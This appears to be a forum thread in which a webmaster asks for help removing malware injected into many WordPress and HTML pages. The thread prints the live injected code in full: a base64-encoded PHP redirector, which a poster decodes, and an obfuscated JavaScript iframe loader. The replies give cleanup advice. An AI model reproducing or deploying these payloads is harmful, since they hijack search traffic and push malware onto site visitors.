I've a keylogger and can't get rid of it

NeVeR

I've somehow got a keylogger on my PC.

It keeps accessing my FTP ( 2 different hosting accounts with different companies ) and installing badware/phising sites etc on my domains.

It installs this code into the index pages and sometimes other pages

<?php	 	eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
/**

This happened a few months ago on one of my servers. I changed all the passwords etc .. ran virus scans etc but I must not have removed it.

What is the best thing to do apart from formatting the HDD ?

I'm running malwarebyte now but what else ?

NeVeR

I've a few wordpress press sites and they have put this code on every single page !! sometimes more then once !

ethernet

NeVeR wrote: »

I've a few wordpress press sites and they have put this code on every single page !! sometimes more then once !

Yip. Best to edit it out of the template.

That base 64 reads as follows:

[PHP]
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER;
$uag=$_SERVER;
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://froling.bee.pl/");
exit();
}
}
}
}
[/PHP]

NeVeR

how did you get that ?

Also is there some find of tool to edit and remove from every page? there's over 100 pages.. I'd say close to 1000 pages infected.

NeVeR

oh found out how you got that..

What can i use to give my PC the best scan

NeVeR

I just ran the latest Trojan Remover and it came back with nothing !

Going to do a big scan now.

LoLth

if you're using windows,

download the USB version of superantispyware and then go get hijackthis

throw onto a USB key.

restart in safemode

run both utilities (for hijackthis, save the log file to the USB key)

from a different machine, analyze the hijackthis logfile at :
http://www.hijackthis.de/

NeVeR

Just wondering why do i need a different PC to check it ?

I'll try this when i get home.

I do have full access to my normal PC, It's just my FTP files they are being targeted.. and i'm sure some other stuff as well.

Thanks i'll try this when i'm home.

LoLth

because you will have run hijackthis with the PC running in safemode.. where nothign runs unless you tell it to, so it would be better not to go browsing the internet (assuming you've selected safemode with networking) with your AV/AM disabled. you could restart the PC normally, check the log file and then go and manually edit the registry but that would be an unnecessary risk and not advisable, or you could boot back into safemode, run hijackthis again and see if you can remember 100% which registry key did the log file website say was bad and which one was ok but not advised. then of course you've got the reg keys that were marked bad by users but are actually ok applications if you know they are there and the users just took a disliking to them. Also, you have to assume that whatever infection it is does not have the extremely unusual characteristic of moving its registry info on reboot or renewing any browser/dll hooks which would change the result picked up in hijackthis.

you might not want to restart because you should have hijackthis open while you check the report at the URL i gave and you can easily find the correlating tickbox to remove the registry key that is being reported as bad (note this is editing the registry so *ONLY* elect to remove registry keys you know are bad. best bet if you are unsure is find more information about the program/key online - which is better to do with hijackthis open so you can cross reference).

I'm not being smart here but if you arent familiar with anti-virus / anti-malware the best advise I can give you is get a friend or relative with tech support experience to do this for you or drop your pc in to a local computer repair company and ask them to do a clean up. oh, and make a back up! (full system, infection and all).

on a side note: how did you come to the conclusion that you have a virus, and more specifically a keylogger? (how do you know its on your PC and not on the webserver - buried in the basic template you use?)

NeVeR

thanks for the reply.

My FTP account on 2 different hosting accounts ( they are in to totally different counties ) both where accessed and these code uploaded to every page on my server over 40 websites - 1000's of pages

Also they uploaded folders with credit card phishing schemes - I only found out about them when 2 different banks emailed me.

Google marked my sites are malicious and i had to good through a few steps to remove the badware and get google to review them so they can be listed again.

The 1st case happened about 2 months ago on 1 server - I removed all the files and did a total PC scan using malwarebytes. I thought I got everything out of there but yesterday one of my sites went down on my second server - I've about 20 domains on this one.. and again every page had this code in it...

I can only assume they keylogged my FTP details.

The sites that where effected where mainly wordpress sites.. but also some normal HTML sites.

Funny thing is the support guy on my hosting account said there was no logins from anywhere other then my location... so i've no idea really.

NeVeR

LoLth wrote: »

I'm not being smart here but if you arent familiar with anti-virus / anti-malware the best advise I can give you is get a friend or relative with tech support experience to do this for you or drop your pc in to a local computer repair company and ask them to do a clean up. oh, and make a back up! (full system, infection and all).

Funny thing is i am.. I'm the guy my friends all give there PCs/Laptops to to fix.. and I do they them fixed.. But i've never had a keylogger before.. and never accessing my FTP.

It's normally just a worm / virus etc

I've used hijackthis loads of times when a browser jacking occurs or something to that effect.

I didn't know abut using a second PC to check the file. It makes sense. But i didn't have a second PC/Laptop to hand. I'll get my g/f laptop later.. in work now.

Gavin

NeVeR wrote: »

thanks for the reply.

My FTP account on 2 different hosting accounts ( they are in to totally different counties ) both where accessed and these code uploaded to every page on my server over 40 websites - 1000's of pages


The sites that where effected where mainly wordpress sites.. but also some normal HTML sites.

Funny thing is the support guy on my hosting account said there was no logins from anywhere other then my location... so i've no idea really.

It's more likely that you are running a vulnerable version of some web based software. Do you have access to your web server logs? If you do, you can go through them to see how the attacker is getting in. Get the last modified date on your infected files and look in the log file around that date.

Update wordpress and all your plugins as well.

tricky D

It might also be a good idea to check for rogue .htaccess files on the server with malicious redirects in them. I came across a load these in multiple directories when dealing with a very similar problem.

LoLth

as Gavin and tricky D posted +

do your FTP accounts share any commonalities (user/pass the same for each?). one compromised could easily lead to the other being discovered by a bot crawling through vulnerable wordpress pages. Do any of your wordpress pages link to your other website?

while a keylogger is a possibility and should not be ruled out, its not the only possibility so not turning up a culprit in your scan does not necessarily mean the scan isnt doing its job (especially if you have been running the scans in normal running made and not safemode).

NeVeR

Thanks lads. I'll check those when i get home. ( in work now )

As for the FTP i'm the only one that ever accesses it.

I use cpanel - So i'm not sure is there are web server logs in there. But I will check later.

thanks.

LoLth

wasnt there a cpanel FTP vulnerability recently? I seem to rememebr getting an email from my hosting company about why I had to change all my passwords and why FTP was being disabled (oh, and why the new management console was horrible!)

NeVeR

i didnt hear anything. but i'll look into it.

900913

It's possible one of the accounts with the two different hosting companies was compromised first. Then they took your email and passwd hash, and cracked it (assuming there the same passwords) logged into your email account and took all your hosting ftp/cpanel credentials.

Talisman

Have a look on your webserver for timthumb.php - if you have a WordPress then it's quite likely to be there, it's used to dynamically crop/resize images in many themes. There was a vulnerability found in it about 6 months ago that allowed rogue code to be uploaded to the server and executed and unfortunately not all affected themes have been updated with the fix.

The solution is to replace the file with an updated version from the TimThumb Project.

Details of the exploit: Zero Day Vulnerability in many WordPress Themes

NeVeR

Talisman where would i find that file. I had a look in a few folders but couldn't see it.

But today I come with a new problem

The following code is now being placed in all my index pages across all my sites ( on the same server )

<script>if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,57.5,50,59,60,60,52,57,58.5,22,48.5,51,47.5,54,50.5,49.5,51.5,55,22,54,47.5,53.5,49.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,3.5,3.5,61.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5,50,56,47.5,53.5,49.5,56,19,19.5,60.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5,51,57,57,55,28,22.5,22.5,57.5,50,59,60,60,52,57,58.5,22,48.5,51,47.5,54,50.5,49.5,51.5,55,22,54,47.5,53.5,49.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,19.5,28.5,50,22,56.5,57,59.5,53,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5,57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53,49,19,50,19.5,28.5,3.5,3.5,61.5];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f+'C'+'ode'](-h*(1+n[j]));}q=ss;e(q);</script>

I delete it and within a few minutes it is back !!

I am working on ways to improve my wordpress sites security. But I have to find the source of this problem. It's wrecking my head.

Has anything seen this code before and know how to find whatever is reposting it.

h57xiucj2z946q

http://www.google.ie/search?q="<script>if(window.document)aa=/s/g.exec("s").index+[];aaa='0'"&amp;ie=utf-8&amp;oe=utf-8&amp;aq=t&amp;rls=org.mozilla:en-US:official&amp;client=firefox-a

Look at some of them search results. one page suggests weak login credentials?

http://www.malfarmed.com/blog/step-by-step-wordpress-malware-removal/

h57xiucj2z946q

http://jsunpack.jeek.org/dec/go?report=6c8b8051776a3644ddb7b901f6524f9504ee4ed6

NeVeR

So from those links It appears a plugin is causing this to happen.

How can i tell which one ?

Also these sites are a few months old why is it only happening now

I'll try those steps tomorrow. As i've no time today.

thanks.

h57xiucj2z946q

It might be a new wordpress vulnerability using old malware code. I haven't read into it too much, but hats why you may only be seeing it now.

But I think you should pick strong credentials and attempt that removal guide. Most likely its able to spread itself if your .php files are writable.

I think you can make use of htaccess files to protect admin pages of wordpress where you can only access thee pages from certain ip's.

h57xiucj2z946q

A report of one site suffering from similar. Im sure you can scan your website using this malware scanning site blow:
http://sitecheck.sucuri.net/results/vigrxonline.net

suggest this malware infection:
http://sucuri.net/malware/malware-entry-mwjs160

Domains distributing malware:

hxxp://vvesek.freetcp.com/i/i.php?go=
(many others)

You can see the end of the url "i.php?go=1" is similar to the link in the code of the unpacked/de-obfuscated javascript in the link I posted above.

Hints that maybe passwords on your local machine may have been stolen. I suggest you try clean up your pc/laptop first before proceeding to cleaning the wordpress blog.

NeVeR

Ive looked at WP-scan but no idea how to use it.

I take it you need root access or something ?

h57xiucj2z946q

Did you try any of the suggestions in the posts above?

NeVeR

I've backed up my databases and I've just purchased a new hosting account.

On my infected server I've really only 2 sites I care about.

So when I am about to start them up I'll do a full scan of PC again .. i do one everyday.. What should i be using .. I use Malwarebytes at the moment.

Also I will be using a fresh install of wordpress and only installing verified pluggin's

Also a question I had. I made backups of the 2 databases using PHPMYADMIN.

Would these backups carry the virus over to the new server/hosting ?

I will also be using better passwords. I am to blame for using default ones So from now on they will be a lot different.

h57xiucj2z946q

NeVeR wrote: »

I've backed up my databases and I've just purchased a new hosting account.

On my infected server I've really only 2 sites I care about.

So when I am about to start them up I'll do a full scan of PC again .. i do one everyday.. What should i be using .. I use Malwarebytes at the moment.
Try updating malware bytes and do a scan in safe mode

Also I will be using a fresh install of wordpress and only installing verified pluggin's

Also a question I had. I made backups of the 2 databases using PHPMYADMIN.

Would these backups carry the virus over to the new server/hosting ? its possible, but I think its more likely that your .php and .html files are infected.

I will also be using better passwords. I am to blame for using default ones So from now on they will be a lot different.

See in bold above.

NeVeR

thanks.

So i take it the backup doesn't have php and html files in it.. never had this problem before so I've never restored a backup etc.